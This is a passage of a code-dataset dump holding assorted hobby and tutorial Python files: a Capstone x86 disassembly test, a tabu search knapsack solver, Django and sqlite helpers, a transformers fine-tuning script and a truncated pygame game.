юзеров\r\n\r\nprint(\"\\nСписок проверенных юзеров: \")\r\n\r\nfor confirmed_user in confirmed_users:\r\n print(confirmed_user.title())\r\n\r\n","repo_name":"AlexProvatorov/python_crash_course","sub_path":"topic_7/confirmed_users.py","file_name":"confirmed_users.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25226853934","text":"#!/usr/bin/env python\n\n# Capstone Python bindings, by Nguyen Anh Quynnh \nfrom __future__ import print_function\nimport sys\nfrom capstone import *\n\nCODE32 = b\"\\xc0\\xe0\\x02\"\nCODE32 += b\"\\xc0\\xf6\\x02\" # sal dh, 0\nCODE32 += b\"\\xc1\\xf6\\x00\" # sal esi, 0\nCODE32 += b\"\\x82\\xc0\\x00\"\nCODE32 += b\"\\x0f\\x1a\\x00\" # nop dword ptr [eax]\nCODE32 += b\"\\xf7\\xc0\\x11\\x22\\x33\\x44\" # test eax, 0x44332211\nCODE32 += b\"\\xf7\\xc8\\x11\\x22\\x33\\x44\" # test eax, 0x44332211\nCODE32 += b\"\\xf7\\x88\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" # test dword ptr [eax], 0\nCODE32 += b\"\\xf6\\x88\\x00\\x00\\x00\\x00\\x00\" # test byte ptr [eax], 0\n\nCODE32 += b\"\\xd9\\xd8\" # fstpnce st(0), st(0)\nCODE32 += b\"\\xdf\\xdf\" # fstp st(7), st(0)\n\nCODE32 += b\"\\x0f\\x20\\x00\" # mov eax, cr0\nCODE32 += b\"\\x0f\\x20\\x40\" # mov eax, cr0\nCODE32 += b\"\\x0f\\x20\\x80\" # mov eax, cr0\n\nCODE32 += b\"\\x0f\\x22\\x00\" # mov cr0, eax\nCODE32 += b\"\\x0f\\x22\\x40\" # mov cr0, eax\nCODE32 += b\"\\x0f\\x22\\x80\" # mov cr0, eax\n\nCODE32 += b\"\\x0f\\x21\\x00\" # mov eax, dr0\nCODE32 += b\"\\x0f\\x21\\x40\" # mov eax, dr0\nCODE32 += b\"\\x0f\\x21\\x80\" # mov eax, dr0\n\nCODE32 += b\"\\x0f\\x23\\x00\" # mov dr0, eax\nCODE32 += b\"\\x0f\\x23\\x40\" # mov dr0, eax\nCODE32 += b\"\\x0f\\x23\\x80\" # mov dr0, eax\n\n\n_python3 = sys.version_info.major == 3\n\nall_tests = (\n (CS_ARCH_X86, CS_MODE_32, CODE32, \"X86 32 (Intel syntax)\", 0),\n #(CS_ARCH_X86, CS_MODE_64, X86_CODE64, \"X86 64 (Intel syntax)\", 0),\n)\n\n\ndef to_hex(s):\n if _python3:\n return \" \".join(\"0x{0:02x}\".format(c) for c in s) # <-- Python 3 is OK\n else:\n return \" \".join(\"0x{0:02x}\".format(ord(c)) for c in s)\n\n# ## Test cs_disasm_quick()\ndef test_cs_disasm_quick():\n for (arch, mode, code, comment, syntax) in all_tests:\n print(\"Platform: %s\" % comment)\n print(\"Code: %s\" %(to_hex(code))),\n print(\"Disasm:\")\n for (addr, size, mnemonic, op_str) in cs_disasm_lite(arch, mode, code, 0x1000):\n print(\"0x%x:\\t%s\\t%s\" % (addr, mnemonic, op_str))\n print()\n\n\nif __name__ == '__main__':\n test_cs_disasm_quick()\n","repo_name":"cuckoosandbox/monitor","sub_path":"src/capstone/suite/x86odd.py","file_name":"x86odd.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":315,"dataset":"github-code","pt":"61"} +{"seq_id":"4162440407","text":"from __future__ import print_function, division\nimport numpy as np\nfrom queue import Queue\n\nclass TabuSearch:\n def __init__(self, options, weights, values, capacities):\n self.itemCount = options['itemCount']\n self.dimensions = options['dimensions']\n self.maxStagnationCounter = options['maxStagnationCounter']\n self.diversificationFlips = options['diversificationFlips']\n self.tabuListSize = options['tabuListSize']\n self.maxIterations = options['maxIterations']\n self.weights = np.array(weights)\n self.values = np.array(values)\n self.capacities = np.array(capacities)\n\n if self.itemCount < 1:\n raise ValueError('Invalid itemCount value')\n if self.dimensions < 1:\n raise ValueError('Invalid dimensions value')\n if self.maxStagnationCounter < 0:\n raise ValueError('Invalid maxStagnationCounter value')\n if self.diversificationFlips < 0 or self.diversificationFlips > self.itemCount:\n raise ValueError('Invalid diversificationFlips value')\n if self.tabuListSize < 0:\n raise ValueError('Invalid tabuListSize value')\n if self.maxIterations < 1:\n raise ValueError('Invalid maxIterations value')\n if self.weights.shape != (self.dimensions, self.itemCount):\n raise ValueError('Invalid weights matrix')\n if self.values.shape != (self.itemCount,):\n raise ValueError('Invalid values vector')\n if self.capacities.shape != (self.dimensions,):\n raise ValueError('Invalid capacities vector')\n\n # Tabu search history variables\n self.feasibleSteps = 0\n self.infeasibleSteps = 0\n self.successfulDiversifications = 0\n self.failedDiversifications = 0\n self.solutionImprovements = 0\n self.tabuListFlushes = 0\n\n # Tabu search state variables\n self.curSolution = np.zeros(self.itemCount)\n self.curSolutionFeasible = True\n self.curInfeasibilityMeasure = 0\n self.bestSolution = np.zeros(self.itemCount)\n self.bestSolutionValue = 0\n self.stagnationCounter = 0\n self.stagnationList = np.zeros(self.itemCount)\n self.tabuSet = set()\n self.tabuQueue = Queue()\n\n\n def Run(self, printHistory = False):\n \"\"\"Runs the Tabu search algorithm with the specified options,\n returning the best found solution and its value.\n \"\"\"\n iteration = 0\n while iteration < self.maxIterations:\n self.Step()\n iteration += 1\n if printHistory:\n print('Feasible steps:', self.feasibleSteps)\n print('Infeasible steps:', self.infeasibleSteps)\n print('Successful diversifications:', self.successfulDiversifications)\n print('Failed diversifications:', self.failedDiversifications)\n print('Solution improvements:', self.solutionImprovements)\n print('Tabu list flushes:', self.tabuListFlushes)\n print('')\n\n return self.bestSolution, self.bestSolutionValue\n\n def Step(self):\n \"\"\"Runs a single step of the Tabu search algorithm, changing\n the state. Returns None.\n \"\"\"\n if self.curSolutionFeasible:\n self.StepFeasible()\n else:\n self.StepInfeasible()\n\n\n def StepFeasible(self):\n \"\"\"Called by the Step method if curSolution is feasible.\n \"\"\"\n self.feasibleSteps += 1\n newSolution, newSolutionValue = self.FindFeasibleSolution()\n if newSolution is not None:\n self.UpdateSolution(newSolution, newSolutionValue)\n else:\n diversified = self.Diversify()\n if not diversified:\n self.MoveToInfeasibleSpace()\n self.failedDiversifications += 1\n else:\n self.successfulDiversifications += 1\n\n\n def StepInfeasible(self):\n \"\"\"Called by the StepFeasible method if no feasible solution can be found\n or by Step if curSolution is infeasible.\n \"\"\"\n self.infeasibleSteps += 1\n self.MoveToFeasibleSpace()\n\n\n def Diversify(self):\n \"\"\"Called by StepFeasible. Returns True if diversification happened,\n False otherwise\n \"\"\"\n if self.stagnationCounter < self.maxStagnationCounter:\n return False\n else:\n newSolution = self.curSolution.copy()\n for flip in range(self.diversificationFlips):\n idx = self.stagnationList.argmax()\n newSolution[idx] = 1\n self.stagnationList[idx] = 0\n self.UpdateSolution(newSolution)\n self.stagnationCounter = 0\n return True\n\n\n def FindFeasibleSolution(self):\n \"\"\"Tries adding items into the solution until one is found that is feasible.\n The solution and its value are returned if its found, otherwise\n None, None is returned.\n \"\"\"\n candidate = self.curSolution.copy()\n for idx, elem in enumerate(self.curSolution):\n if elem == 0:\n candidate[idx] = 1\n if self.Feasible(candidate) and not self.TabuListContains(candidate):\n return candidate, self.SolutionValue(candidate)\n else:\n candidate[idx] = 0\n return None, None\n\n\n def Feasible(self, solution):\n \"\"\"solution is a numpy array of ones and zeros. The return value is\n a numpy bool, indicating whether or not the solution is feasible.\n \"\"\"\n return np.all(np.less_equal(np.dot(self.weights, solution), self.capacities))\n\n\n def SolutionValue(self, solution):\n \"\"\"solution is a numpy array of ones and zeros. The return value is a\n numpy int, or float if there's a weight that's a float.\n \"\"\"\n return np.sum(np.multiply(solution, self.values))\n\n\n def AddToTabuList(self, solution):\n \"\"\"Adds the solution (a numpy array of ones and zeros) into the tabu\n list\n \"\"\"\n if len(self.tabuSet) > self.tabuListSize:\n oldest = self.tabuQueue.get(block=False)\n self.tabuSet.remove(oldest)\n\n asTuple = tuple(solution)\n self.tabuQueue.put(asTuple, block=False)\n self.tabuSet.add(asTuple)\n\n\n def TabuListContains(self, solution):\n return tuple(solution) in self.tabuSet\n\n\n def UpdateSolution(self, newSolution, newSolutionValue = None):\n \"\"\"Updates all state variables.\n \"\"\"\n self.curSolution = newSolution\n self.AddToTabuList(newSolution)\n if newSolutionValue is None and not self.Feasible(newSolution):\n self.curSolutionFeasible = False\n else:\n self.curSolutionFeasible = True\n if newSolutionValue == None:\n newSolutionValue = self.SolutionValue(newSolution)\n if newSolutionValue > self.bestSolutionValue:\n self.UpdateBestSolution(newSolution, newSolutionValue)\n else:\n self.stagnationCounter += 1\n for idx, elem in enumerate(newSolution):\n if elem == 0:\n self.stagnationList[idx] += 1\n else:\n self.stagnationList[idx] = 0\n\n\n def UpdateBestSolution(self, newBestSolution, newBestSolutionValue):\n \"\"\"Does not check whether or not newBestSolution is actually better\n than self.bestSolution.\n \"\"\"\n self.solutionImprovements += 1\n self.bestSolution = newBestSolution\n self.bestSolutionValue = newBestSolutionValue\n self.stagnationCounter = 0\n\n\n def CalcInfeasibility(self, solution):\n \"\"\"Returns the sum of the normalized amounts by which each capacity is\n exceeded.\n \"\"\"\n resourceUsages = np.dot(self.weights, solution)\n infeasibilityMeasure = 0\n for usage, capacity in zip(resourceUsages, self.capacities):\n if usage > capacity:\n infeasibilityMeasure += (usage - capacity) / capacity\n return infeasibilityMeasure\n\n\n def MoveToInfeasibleSpace(self):\n \"\"\"Attempts to move the solution into infeasible space. If that's not\n possible, moves to the best worse solution. No return value.\n \"\"\"\n infeasibleSolution = self.BestInfeasibleSolution()\n if infeasibleSolution is not None:\n self.UpdateSolution(infeasibleSolution)\n return\n bestWorseSolution, bestWorseSolutionValue = self.BestWorseSolution()\n if bestWorseSolution is not None:\n self.UpdateSolution(bestWorseSolution, bestWorseSolutionValue)\n return\n # If all else fails, we flush the tabu list. This wastes an iteration.\n self.tabuSet = set()\n self.tabuQueue = Queue()\n self.tabuListFlushes += 1\n\n\n def MoveToFeasibleSpace(self):\n \"\"\"Attempts to move the solution into feasible space. If that fails,\n moves into the least infeasible neighboring solution not in the tabu\n list\n \"\"\"\n curCandidate = self.curSolution.copy()\n bestCandidate = None\n bestCandidateInfeasibility = float('inf')\n for idx, elem in enumerate(self.curSolution):\n curCandidate[idx] = 1 - curCandidate[idx]\n if not self.TabuListContains(curCandidate):\n curCandidateInfeasibility = self.CalcInfeasibility(curCandidate)\n if curCandidateInfeasibility == 0:\n self.UpdateSolution(curCandidate)\n return\n if curCandidateInfeasibility < bestCandidateInfeasibility:\n bestCandidate = curCandidate.copy()\n bestCandidateInfeasibility = curCandidateInfeasibility\n curCandidate[idx] = 1 - curCandidate[idx]\n if bestCandidate is not None:\n self.UpdateSolution(bestCandidate)\n else:\n # If we've failed to find a move, flush the tabu list. This wastes an iteration.\n self.tabuSet = set()\n self.tabuQueue = Queue()\n self.tabuListFlushes += 1\n\n\n def BestWorseSolution(self):\n \"\"\"Returns None, 0 if all worse solutions are in the tabu list, otherwise\n the worse solution and its value\n \"\"\"\n curWorseSolution = self.curSolution.copy()\n bestWorseSolution = None\n bestWorseSolutionValue = 0\n for idx, elem in enumerate(self.curSolution):\n if elem == 1:\n curWorseSolution[idx] = 0\n if not self.TabuListContains(curWorseSolution):\n curWorseSolutionValue = self.SolutionValue(curWorseSolution)\n if curWorseSolutionValue > bestWorseSolutionValue:\n bestWorseSolution = curWorseSolution.copy()\n bestWorseSolutionValue = curWorseSolutionValue\n curWorseSolution[idx] = 1\n return bestWorseSolution, bestWorseSolutionValue\n\n\n def BestInfeasibleSolution(self):\n \"\"\"Finds the best solution out of any neighboring one and returns it.\n Returns None if no solution not in the tabu list can be found.\n \"\"\"\n curInfeasibleSolution = self.curSolution.copy()\n curInfeasibleSolutionValue = self.SolutionValue(curInfeasibleSolution)\n bestInfeasibleSolution = None\n bestInfeasibleSolutionValue = curInfeasibleSolutionValue\n for idx, elem in enumerate(self.curSolution):\n if elem == 0:\n curInfeasibleSolution[idx] = 1\n if self.TabuListContains(curInfeasibleSolution):\n continue\n\n curInfeasibleSolutionValue = self.SolutionValue(curInfeasibleSolution)\n if curInfeasibleSolutionValue > bestInfeasibleSolutionValue:\n bestInfeasibleSolution = curInfeasibleSolution.copy()\n bestInfeasibleSolutionValue = curInfeasibleSolutionValue\n curInfeasibleSolution[idx] = 0\n\n return bestInfeasibleSolution\n\n\nif __name__ == '__main__':\n print('You\\'ve tried opening TabuSearch.py directly, you should just use the class instead')\n","repo_name":"muhamedparic/RIM1","sub_path":"OR/TS/TabuSearch.py","file_name":"TabuSearch.py","file_ext":"py","file_size_in_byte":12195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20974641755","text":"menu={\n \"Baja Taco\": 4.00,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n}\nnewMenu={}\nfor key in menu.items():\n i=0\n name=key[i].lower()\n newMenu[name]=menu[key[i]]\n i==i+1\n\ntotal=0\ndef sum():\n while True:\n try:\n item=input(\"Item: \").lower()\n if item in newMenu:\n global total\n total += newMenu[item]\n total2=format(total,\".2f\")\n print(f\"${total2}\")\n except EOFError:\n print()\n break\nsum()","repo_name":"Ciridaee/python_selfwork","sub_path":"python/start/taqueria/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"242518474","text":"import time\nfrom datetime import datetime\n\nfrom .models import Document\n\n\ndef get_pubs_count(start, end):\n return Document.objects.raw(\"SELECT id, CAST(STRFTIME('%%Y', cover_date) AS INTEGER) AS year, \"\n \"CAST(strftime('%%j', cover_date) AS INTEGER) / 7 AS week, \"\n \"COUNT(*) as count \"\n \"FROM api_document \"\n \"WHERE year >= %s AND year <= %s \"\n \"GROUP BY year, week \", [start, end])\n\n\ndef get_pubs(start, end):\n time_start = time.time()\n pubs = get_pubs_count(start, end)\n time_mid = time.time()\n weeks_per_year = 53\n result = {}\n # for year in range(start, end + 1):\n # result[year] = [0] * weeks_per_year\n result = {year: [0] * weeks_per_year for year in range(start, end + 1)}\n for pub in pubs:\n result[pub.year][pub.week] = pub.count\n total = 0\n for year, weeks in result.items():\n for week, count in enumerate(weeks):\n total += count\n result[year][week] = total\n time_end = time.time()\n print(time_mid - time_start)\n print(time_end - time_mid)\n print(time_end - time_start)\n return result\n\n\ndef check_input(start, end):\n try:\n start = int(start)\n end = int(end)\n except ValueError:\n raise ValueError('Wrong year.')\n if start < 1900 or end < 1900:\n raise ValueError('Wrong year.')\n if start > end:\n raise ValueError('Wrong range.')\n return start, end\n","repo_name":"ignatyevm/test_task","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13001035151","text":"import numpy as np\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\n\r\nfrom datasets import load_dataset, load_metric\r\n\r\nimport transformers\r\nfrom transformers import AutoTokenizer\r\nfrom transformers import AutoModelForSequenceClassification, TrainingArguments, Trainer\r\n\r\nprint(transformers.__version__)\r\n\r\ndataset_base = load_dataset(\"./frenchmedmcqa.py\")\r\n\r\ndataset_train = dataset_base[\"train\"]\r\nprint(len(dataset_train))\r\n\r\ndataset_val = dataset_base[\"validation\"]\r\nprint(len(dataset_val))\r\n\r\ndataset_test = dataset_base[\"test\"]\r\nprint(len(dataset_test))\r\n\r\nmetric = load_metric(\"accuracy\")\r\n\r\ntask = \"frenchmedmcqa\"\r\nnum_labels = 31\r\n\r\nbatch_size = 4 # XLM-ROBERTA-BASE\r\n# batch_size = 6 # RTX 2080 Ti\r\n# batch_size = 32 # V100\r\n# batch_size = 24\r\n# batch_size = 16\r\n\r\nEPOCHS = 10\r\n\r\n# model_checkpoint = \"dmis-lab/biobert-base-cased-v1.2\"\r\n# model_checkpoint = \"dmis-lab/biobert-v1.1\"\r\n# model_checkpoint = \"microsoft/BiomedNLP-PubMedBERT-base-uncased-abstract-fulltext\"\r\n# model_checkpoint = \"camembert-base\"\r\n# model_checkpoint = \"xlm-roberta-base\"\r\nmodel_checkpoint = \"allenai/scibert_scivocab_uncased\"\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(model_checkpoint, use_fast=True)\r\nmodel = AutoModelForSequenceClassification.from_pretrained(model_checkpoint, num_labels=num_labels)\r\n\r\nmetric_name = \"accuracy\"\r\nmodel_name = model_checkpoint.split(\"/\")[-1]\r\n\r\ndef preprocess_function(examples):\r\n return tokenizer(examples[\"bert_text\"], truncation=True, max_length=model.config.max_position_embeddings) # THE ONE\r\n\r\ndataset_train = dataset_train.map(preprocess_function, batched=True)\r\ndataset_val = dataset_val.map(preprocess_function, batched=True)\r\ndataset_test = dataset_test.map(preprocess_function, batched=True)\r\n\r\nargs = TrainingArguments(\r\n f\"{model_name}-finetuned-{task}\",\r\n evaluation_strategy = \"epoch\",\r\n save_strategy = \"epoch\",\r\n learning_rate=2e-5,\r\n per_device_train_batch_size=batch_size,\r\n per_device_eval_batch_size=batch_size,\r\n num_train_epochs=EPOCHS,\r\n weight_decay=0.01,\r\n load_best_model_at_end=True,\r\n metric_for_best_model=metric_name,\r\n push_to_hub=False,\r\n)\r\n\r\ndef compute_metrics(pred):\r\n labels = pred.label_ids\r\n preds = pred.predictions.argmax(-1)\r\n precision, recall, f1, _ = precision_recall_fscore_support(labels, preds, average='weighted')\r\n acc = accuracy_score(labels, preds)\r\n return {\r\n 'accuracy': acc,\r\n 'f1': f1,\r\n 'precision': precision,\r\n 'recall': recall\r\n }\r\n\r\ntrainer = Trainer(\r\n model,\r\n args,\r\n train_dataset=dataset_train,\r\n eval_dataset=dataset_val,\r\n tokenizer=tokenizer,\r\n compute_metrics=compute_metrics,\r\n)\r\n\r\ntrainer.train()\r\n\r\ntrainer.evaluate()\r\n","repo_name":"qanastek/FrenchMedMCQA","sub_path":"Transformers Classifier/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"71987977793","text":"def save_data_in_db(city, date, temp, hum):\n import sqlite3\n con = sqlite3.connect(\"weather_data.db\")\n cur = con.cursor()\n # data = (data['dt'], data['main']['temp'], data['main']['humidity'])\n cr_command = f\"CREATE TABLE IF NOT EXISTS {city} (date,temperature,humidity)\"\n cur.execute(cr_command)\n ins_command = \"INSERT INTO {} VALUES {};\".format(city, (date, temp, hum))\n cur.execute(ins_command)\n con.commit()\n con.close()\n print(\"Saved data in database\")\n\n\ndef check_db(city):\n import sqlite3\n con = sqlite3.connect(\"weather_data.db\")\n cur = con.cursor()\n command = f\"SELECT * FROM {city}\"\n cur.execute(command)\n for i in cur.fetchall():\n print(i)\n","repo_name":"ThePythonist/Weather-Telegram-Bot","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30082096801","text":"import heapq\ndef findsthLargest(nums, k):\n\theap = []\n\theapq.heapify(heap)\n\tfor i in range(len(nums)):\n\t\theapq.heappush(heap,nums[i])\n\n\tres=[]\n\tres.append([y for y in heapq.nsmallest(k, heap)])\n\tprint(res)\n\treturn res[-1][-1]\n\nprint(findsthLargest([5,2,3,1,9],4))","repo_name":"zvut/CODING-PRACTICE","sub_path":"kthsmallest.py","file_name":"kthsmallest.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5833688924","text":"#!/usr/bin/env python3\nfrom os import name, system\nfrom turtle import Turtle, Screen, colormode\nimport random\n# import colorgram\n\n\ndef clear():\n if name == 'nt':\n system('cls')\n else:\n system('clear')\n\n\nclear()\ntim = Turtle()\n# Task #1\n# timmy_the_turtle.hideturtle()\n# timmy_the_turtle.color('black', 'dark green')\n\n# Task #2\n# for _ in range(15):\n# tim.forward(10)\n# tim.penup()\n# tim.forward(10)\n# tim.pendown()\n\n# Task #3\n# def draw_shape(num_sides):\n# angle = 360 / sides\n# for _ in range(sides):\n# tim.right(angle)\n# tim.forward(100)\n#\n# colormode(255)\n# for sides in range(3,11):\n# tim.color(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n# draw_shape(sides)\n\n\n# Task #4\n# def random_color():\n# r = random.randint(0, 255)\n# g = random.randint(0, 255)\n# b = random.randint(0, 255)\n# randomized_color = (r, g, b)\n# return randomized_color\n#\n#\n# def random_step():\n# tim.color(random_color())\n# # tim.width(random.randint(1,10))\n# tim.seth(random.randrange(0, 271, 90))\n# tim.forward(30)\n#\n#\n# colormode(255)\n# tim.width(10)\n# tim.speed(10)\n# for _ in range(200):\n# random_step()\n\n\n# Task #5\n# def random_color():\n# r = random.randint(0, 255)\n# g = random.randint(0, 255)\n# b = random.randint(0, 255)\n# randomized_color = (r, g, b)\n# return randomized_color\n#\n#\n# colormode(255)\n# tim.speed('fastest')\n#\n#\n# def draw_spirograph(size_of_gap):\n# for _ in range(int(360 / size_of_gap)):\n# tim.color(random_color())\n# tim.circle(100)\n# tim.setheading(tim.heading() + size_of_gap)\n#\n#\n# draw_spirograph(2)\n\n\n# Task #6\n# rgb_colors = []\n# for color in colors:\n# r = color.rgb.r\n# g = color.rgb.g\n# b = color.rgb.b\n# new_color = (r, g, b)\n# rgb_colors.append(new_color)\ntim.hideturtle()\ntim.speed('fastest')\ncolormode(255)\ntim.penup()\ntim.setheading(225)\ntim.forward(300)\ntim.setheading(0)\ncolor_list = [(22, 27, 46), (59, 93, 148), (116, 162, 206), (190, 225, 243), (74, 121, 199), (40, 24, 35),\n (36, 56, 112), (187, 143, 164), (215, 243, 239), (120, 78, 94), (237, 221, 199), (164, 184, 232),\n (135, 215, 232), (237, 206, 219), (191, 155, 138), (39, 24, 19), (190, 87, 109), (123, 87, 78),\n (230, 167, 185), (21, 31, 27), (106, 41, 55), (144, 174, 167), (86, 101, 95), (72, 147, 174),\n (147, 216, 209), (206, 86, 75), (232, 173, 163), (117, 40, 35), (215, 200, 152), (99, 144, 134)]\nfor _ in range(10):\n for _ in range(10):\n # Drop dot, move forward\n tim.dot(20, random.choice(color_list))\n tim.forward(50)\n # Move up and start over\n tim.seth(90)\n tim.forward(50)\n tim.seth(180)\n tim.forward(500)\n tim.seth(0)\n\nscreen = Screen()\nscreen.exitonclick()\n","repo_name":"Appl3Tree/Python","sub_path":"100 Days of Code/Day 018 - Turtle & the Graphical User Interface (GUI)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585768321","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 30 11:13:35 2017\r\n\r\n@author: Julien\r\n\"\"\"\r\n\r\nimport os\r\nimport math\r\nfrom operator import itemgetter\r\nfrom decimal import *\r\n\r\ngetcontext().prec=10\r\n\r\n\r\nchem=\"C:/CodeJam/Exo A\"\r\nFhIn=\"A-large.in\"\r\nFhOut=\"Result\"+FhIn\r\n\r\n\r\ndef calc(panList):\r\n cal=0\r\n for p in panList:\r\n cal+=(2*math.pi*p[0]*p[1])\r\n radius=[p[0] for p in panList]\r\n \r\n cal+=(math.pi*max(radius)*max(radius))\r\n return cal\r\n\r\ndef surf(pancake):\r\n return (2*math.pi*pancake[0]*pancake[1] + pancake[0]*pancake[0]*math.pi)\r\n\r\ndef hauteur(pancake):\r\n return (2*math.pi*pancake[0]*pancake[1])\r\n \r\n\r\ndef solve(N,K,panList):\r\n \r\n for i in range(N):\r\n panList[i].append(surf(panList[i]))\r\n panList[i].append(hauteur(panList[i]))\r\n \r\n test=True\r\n index=0\r\n panSurf=sorted(panList,key=lambda x: x[2],reverse=True)\r\n# print(\"Surf\")\r\n# print(panSurf)\r\n while(test):\r\n rad=panSurf[index][0]\r\n# print(panSurf[index])\r\n panH=[panSurf[x] for x in range(len(panSurf)) if x!=index]\r\n# print(panH)\r\n if len(panH)>=K-1:\r\n panRes=[panSurf[index]]\r\n panH=sorted(panH,key=lambda x: x[3],reverse=True)\r\n for i in range(K-1):\r\n panRes.append(panH[i])\r\n test=False\r\n else:\r\n index+=1\r\n \r\n \r\n \r\n panH=sorted(panList,key=lambda x: x[2],reverse=True)\r\n \r\n \r\n \r\n# print(panRes)\r\n return calc(panRes)\r\n \r\n\r\n\r\n\r\nwith open(os.path.join(chem,FhIn),'r') as f:\r\n with open(os.path.join(chem,FhOut),'w') as fOut:\r\n C=int(f.readline())\r\n \r\n for c in range(C):\r\n# c=4\r\n [N,K]=[int(x) for x in f.readline().split()]\r\n panList=[]\r\n for p in range(N):\r\n panList.append([int(x) for x in f.readline().split()])\r\n \r\n r=solve(N,K,panList)\r\n \r\n fOut.write(\"Case #\"+str(c+1)+\": \" + str(\"%.10f\" % r) +'\\n')\r\n ","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/300.py","file_name":"300.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25894280465","text":"import time\n\ndef load(storage:list[dict], last_request:dict):\n is_success = False\n for each in storage: # Search for variable by name\n if each.get(\"var_name\") == last_request.get(\"var_name\"):\n time.sleep(each.get(\"var_size\")/1000) # Execution time\n is_success = True # Success\n break\n return {\"is_success\": is_success}\n\n\ndef store(storage:list[dict], last_request:dict, capacity:int, in_use:int):\n is_success = False\n for each in storage: # Search for variable\n if each.get(\"var_name\") == last_request.get(\"var_name\"):\n return {\"is_success\": True} # If found directly return\n\n if last_request.get(\"var_size\") + in_use <= capacity: # If size does not overflow capacity\n storage.append(last_request) # Store\n in_use += last_request.get(\"var_size\")\n time.sleep(last_request.get(\"var_size\")/1000) # Execution time\n is_success = True\n \n return {\"storage\": storage, \"in_use\": in_use, \"is_success\": is_success}\n\n\ndef update(storage:list[dict], last_request:dict, capacity:int, in_use:int):\n old_request = dict()\n is_success = False # Not found\n\n for each in storage: # Search for the request\n if each.get(\"var_name\") == last_request.get(\"var_name\"):\n old_request = each\n is_success = True # Found\n break\n \n if is_success: # If found, check size\n size_diff = last_request.get(\"var_size\") - old_request.get(\"var_size\")\n if in_use + size_diff <= capacity: # If does not overflow the capacity\n storage.remove(old_request) # Delete old\n time.sleep(old_request.get(\"var_size\")/1000) # Execution time\n\n storage.append(last_request) # Add new\n in_use += size_diff\n time.sleep(last_request.get(\"var_size\")/1000) # Execution time\n \n return {\"storage\": storage, \"in_use\": in_use, \"is_success\": is_success}","repo_name":"canbatuhan/mesh-sv","sub_path":"functions/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18283049204","text":"import pygame\r\nimport random\r\nimport sys\r\n\r\n\r\npygame.init()\r\n\r\nWIDTH = 800\r\nHEIGHT = 600\r\n\r\nbackground = pygame.image.load(\"C:/Users/DELL/Documents/Mission-Cube/data/background1.png\")\r\nbackground1 = pygame.image.load(\"C:/Users/DELL/Documents/Mission-Cube/data/cube.png\")\r\n\r\nbackground2 = pygame.image.load(\"C:/Users/DELL/Documents/Mission-Cube/data/cube2.png\")\r\n\r\nGREEN = (0,128,0)\r\nRED = (255,0,0)\r\nPURPLE = (128,0,128)\r\nORANGE = (255,165,0)\r\nBLUE = (0, 255, 255)\r\ncolours = [BLUE, GREEN, RED, PURPLE]\r\nBACKGROUND_COLOUR = (0,0,0)\r\n\r\nmusic = pygame.mixer.music.load(\"C:/Users/DELL/Documents/Mission-Cube/data/song2.mp3\")\r\npygame.mixer.music.play(-1)\r\n\r\nSPEED = 10\r\n\r\nplayer_size = 50\r\nplayer_pos = [WIDTH/2, HEIGHT - 1.1*player_size]\r\nx_po = player_pos[0]\r\ny_po = player_pos[1]\r\n\r\nenemy_size = 50\r\nenemy_pos = [random.randint(0, WIDTH - enemy_size), 0]\r\nenemy_list = [enemy_pos]\r\n\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\r\n\r\nscore = 0\r\n\r\ngame_over = False\r\n\r\nfinish = True\r\n\r\nclock = pygame.time.Clock()\r\n\r\nfont = pygame.font.SysFont(\"monospace\", 25)\r\n\r\n\r\nclass button(object):\r\n \"\"\"docstring for ClassName\"\"\"\r\n def __init__(self, arg):\r\n super(ClassName, self).__init__()\r\n self.arg = arg\r\n\r\n\r\ndef drop_enemies(enemy_list):\r\n delay = random.random()\r\n if len(enemy_list) < 15 and delay < 0.1:\r\n x_pos = random.randint(0, WIDTH - enemy_size)\r\n y_pos = 0\r\n enemy_list.append([x_pos, y_pos])\r\n\r\ndef draw_enemies(enemy_list):\r\n x = 0\r\n for enemy_pos in enemy_list:\r\n pygame.draw.rect(screen, BLUE, (enemy_pos[0], enemy_pos[1], enemy_size, enemy_size))\r\n\r\ndef set_level(score, SPEED):\r\n if score < 10:\r\n SPEED = 10\r\n elif score < 30:\r\n SPEED = 15\r\n elif score < 50:\r\n SPEED = 20\r\n elif score < 70:\r\n SPEED = 25\r\n elif score < 